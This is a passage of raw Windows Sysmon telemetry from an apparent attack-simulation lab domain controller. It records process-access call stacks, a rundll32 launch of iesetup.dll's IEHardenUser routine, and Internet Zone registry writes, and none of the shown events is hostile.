13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.336{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.320{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1976C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.320{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{00000000-0000-0000-0000-000000000000}1976C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.322{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 
13241300x800000000000000011281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.305{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000) 13241300x800000000000000011280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.289{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003) 13241300x800000000000000011279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.195{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000) 10341000x800000000000000011500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.961{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.945{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.945{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C: